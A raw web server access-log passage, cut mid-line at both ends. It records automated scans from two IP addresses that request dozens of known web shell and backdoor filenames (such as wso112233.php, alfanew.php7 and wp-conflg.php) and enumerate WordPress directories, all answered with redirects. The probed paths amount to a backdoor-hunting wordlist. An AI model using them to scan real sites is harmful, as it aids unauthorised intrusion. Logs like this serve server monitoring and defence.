/wp-includes/Text/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:51:52 -0500] "GET /bolt.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:52 -0500] "GET /bypass.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:53 -0500] "GET /12.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:53 -0500] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:53 -0500] "GET /menu.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:53 -0500] "GET /wp-admin/js/privacy-tools.min.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:54 -0500] "GET /ilex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:54 -0500] "GET /wp-admin/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:54 -0500] "GET /13.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:48 -0500] "GET /Njima.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:49 -0500] "GET /file.php?fm=true HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:49 -0500] "GET /1.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:50 -0500] "GET /f.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:51 -0500] "GET /wp-includes/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:51 -0500] "GET /wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:51 -0500] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:51 -0500] "GET /fm1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.192.110 - - [20/Dec/2025:14:51:52 -0500] "GET /theme.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:52 -0500] "GET /ab.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:53 -0500] "GET /wp-admin/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:54 -0500] "GET /acx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:54 -0500] "GET /wp-admin/network/natural.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:55 -0500] "GET /ar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:55 -0500] "GET /we.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:55 -0500] "GET /NewFile.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:56 -0500] "GET /anna.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:56 -0500] "GET /wp-includes/fonts/ff2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:57 -0500] "GET /goat.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:57 -0500] "GET /xc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:57 -0500] "GET /web.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:57 -0500] "GET /kretek.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:58 -0500] "GET /wp-content/plugins/fix/1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:58 -0500] "GET /.well-known/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:58 -0500] "GET /admin/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:59 -0500] "GET /wp-admin/dropdown.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:51:59 -0500] "GET /alfanew.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:59 -0500] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:59 -0500] "GET /fox.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.192.110 - - [20/Dec/2025:14:52:00 -0500] "GET /wp-includes/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:52:00 -0500] "GET /autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:00 -0500] "GET /worksec.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:01 -0500] "GET /wp-logs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:01 -0500] "GET /up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:02 -0500] "GET /wp-includes/pomo/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:52:02 -0500] "GET /wp-includes/rest-api/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:52:03 -0500] "GET /man.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:52:03 -0500] "GET /wp-includes/css/ff2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:03 -0500] "GET /65ryjkl.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:03 -0500] "GET /wp-admin/users.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:04 -0500] "GET /.well-known/admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:55 -0500] "GET /wp-includes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:55 -0500] "GET /root.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.192.110 - - [20/Dec/2025:14:51:56 -0500] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.192.110 - - [20/Dec/2025:14:51:56 -0500] "GET /wp-content/languages/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:56 -0500] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:57 -0500] "GET /man.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:58 -0500] "GET /wp-includes/widgets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:58 -0500] "GET /as/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:59 -0500] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:52:00 -0500] "GET /1337.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:52:00 -0500] "GET /4.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:52:01 -0500] "GET /wp-includes/Text/network.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:01 -0500] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:01 -0500] "GET /blog.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:02 -0500] "GET /.well-known/acme-challenge/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:02 -0500] "GET /config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:52:02 -0500] "GET /wp-content/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:52:04 -0500] "GET /fix.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:04 -0500] "GET /mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:15 -0500] "GET /wp-includes/customize/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:15 -0500] "GET /wp-includes/blocks/shortcode/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 138.199.60.185 - - [20/Dec/2025:14:52:15 -0500] "GET /wp-includes/js/crop/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:15 -0500] "GET /wp-includes/css/dist/list-reusable-blocks/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-includes/blocks/site-logo/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-includes/Requests/Proxy/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 138.199.60.185 - - [20/Dec/2025:14:52:17 -0500] "GET /wp-includes/SimplePie/Content/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 138.199.60.185 - - [20/Dec/2025:14:52:17 -0500] "GET /wp-content/plugins/elementor/assets/images/app/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:17 -0500] "GET /wp-includes/l10n/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:19 -0500] "GET /wp-includes/SimplePie/Content/Type/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 138.199.60.185 - - [20/Dec/2025:14:52:19 -0500] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:19 -0500] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:20 -0500] "GET /wp-admin/js/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:20 -0500] "GET /wp-includes/php-compat/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:20 -0500] "GET /wp-includes/js/dist/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:20 -0500] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:21 -0500] "GET /vendor/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:21 -0500] "GET /wp-content/x/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:21 -0500] "GET /wp-includes/IXR/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:22 -0500] "GET /wp-admin/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:52:04 -0500] "GET /go.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 138.199.60.185 - - [20/Dec/2025:14:52:15 -0500] "GET /wp-content/languages/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-includes/Requests/src/Auth/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-admin/js/widgets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:16 -0500] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:17 -0500] "GET /wp-includes/blocks/loginout/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 138.199.60.185 - - [20/Dec/2025:14:52:17 -0500] "GET /.well-known/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 138.199.60.185 - - [20/Dec/2025:14:52:18 -0500] "GET /images/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 138.199.60.185 - - [20/Dec/2025:14:52:18 -0500] "GET /wp-includes/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:18 -0500] "GET /backup/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 138.199.60.185 - - [20/Dec/2025:14:52:18 -0500] "GET /wp-admin/network/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:18 -0500] "GET /wp/wp-content/themes/twentytwenty/template-parts/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 138.199.60.185 - - [20/Dec/2025:14:52:19 -0500] "GET /wp-admin/maint/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:19 -0500] "GET /wp-includes/images/smilies/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:20 -0500] "GET /wp-content/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:21 -0500] "GET /wp-includes/blocks/latest-comments/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:21 -0500] "GET /wp-includes/interactivity-api/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 138.199.60.185 - - [20/Dec/2025:14:52:22 -0500] "GET /wp-includes/html-api/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:23 -0500] "GET /wp-includes/css/dist/customize-widgets/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:23 -0500] "GET /cgi-bin/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:23 -0500] "GET /assets/css/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-includes/css/dist/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-content/plugins/seoplugins/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 138.199.60.185 - - [20/Dec/2025:14:52:24 -0500] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) 